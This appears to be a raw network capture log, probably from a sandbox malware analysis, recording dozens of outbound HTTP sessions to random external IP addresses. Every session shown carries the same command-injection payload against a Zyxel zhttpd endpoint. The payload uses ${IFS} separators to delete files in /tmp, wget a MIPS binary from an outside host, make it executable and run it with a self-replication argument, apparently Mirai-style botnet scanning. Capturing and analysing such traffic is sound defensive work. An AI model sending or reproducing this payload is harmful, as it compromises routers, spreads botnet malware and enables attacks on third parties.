                                                        Jan 28, 2024 10:12:42.203937054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1877192.168.2.1439430175.243.20.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203974009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1878192.168.2.1445392157.208.215.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204032898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1879192.168.2.1447118132.128.130.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204066992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1880192.168.2.1441274106.76.99.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204101086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1881192.168.2.1447338160.75.173.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204152107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1882192.168.2.1439848108.121.156.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204180956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1883192.168.2.1457080185.197.74.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204226971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1884192.168.2.144752842.112.112.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204265118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1885192.168.2.144582868.38.188.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204287052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1886192.168.2.1449232179.65.167.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204348087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1887192.168.2.1450202217.110.211.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204370022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1888192.168.2.1443502189.75.249.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204421997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1889192.168.2.1440680111.244.63.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204447985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1890192.168.2.144319246.195.66.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204484940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1891192.168.2.1459868196.234.151.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204546928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1892192.168.2.1444562135.11.199.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204556942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1893192.168.2.1438904169.79.37.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204597950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1894192.168.2.143955897.145.216.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204657078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1895192.168.2.1440808104.127.232.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204689980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1896192.168.2.144599869.142.247.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204730988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1897192.168.2.1442120169.26.45.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204766035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1898192.168.2.1435120158.174.1.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204792976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1899192.168.2.1448828116.163.247.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204839945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1900192.168.2.1434032142.135.156.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204863071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1901192.168.2.1444488175.100.134.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204893112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1902192.168.2.1454022158.124.27.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204935074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1903192.168.2.1454612158.230.253.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.204967976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1904192.168.2.1448824135.240.178.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.205018044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1905192.168.2.144068635.182.239.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.205054045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1906192.168.2.1442540105.221.255.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.205091000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1907192.168.2.143475098.86.235.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.205118895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1908192.168.2.1437032219.18.54.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.205163956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1909192.168.2.144658250.63.160.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.205193043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1910192.168.2.1460818139.84.116.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.205238104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1911192.168.2.145993495.149.132.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.205296040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1912192.168.2.145144225.200.0.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.205332994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1913192.168.2.144326487.52.72.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.216630936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1914192.168.2.146047444.34.7.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.216711044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1915192.168.2.1456496211.72.138.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.216754913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1916192.168.2.144801472.179.213.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.216780901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1917192.168.2.1443620222.17.214.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.216829062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1918192.168.2.1450026166.143.178.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.216876984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1919192.168.2.1447788192.53.37.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.216916084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1920192.168.2.1443766105.30.106.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.216953039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1921192.168.2.1456086103.83.189.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.216986895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1922192.168.2.145232083.73.7.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217026949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1923192.168.2.145238443.67.131.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217066050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1924192.168.2.1459446198.69.12.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217087984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1925192.168.2.1454114140.152.77.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217142105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1926192.168.2.1443156114.175.9.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217180967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1927192.168.2.1439636104.140.150.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217225075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1928192.168.2.1456506145.243.17.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217261076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1929192.168.2.1459848135.251.197.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217300892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1930192.168.2.1436032103.140.12.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217343092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1931192.168.2.143772432.92.71.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217380047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1932192.168.2.1459598211.172.87.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217433929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1933192.168.2.14359005.199.18.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217458010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1934192.168.2.1451434190.110.107.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217492104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1935192.168.2.144062814.141.208.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217554092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1936192.168.2.1438438166.36.170.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217591047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1937192.168.2.1456640157.87.216.114443
                                                        TimestampBytes transferredDirectionData
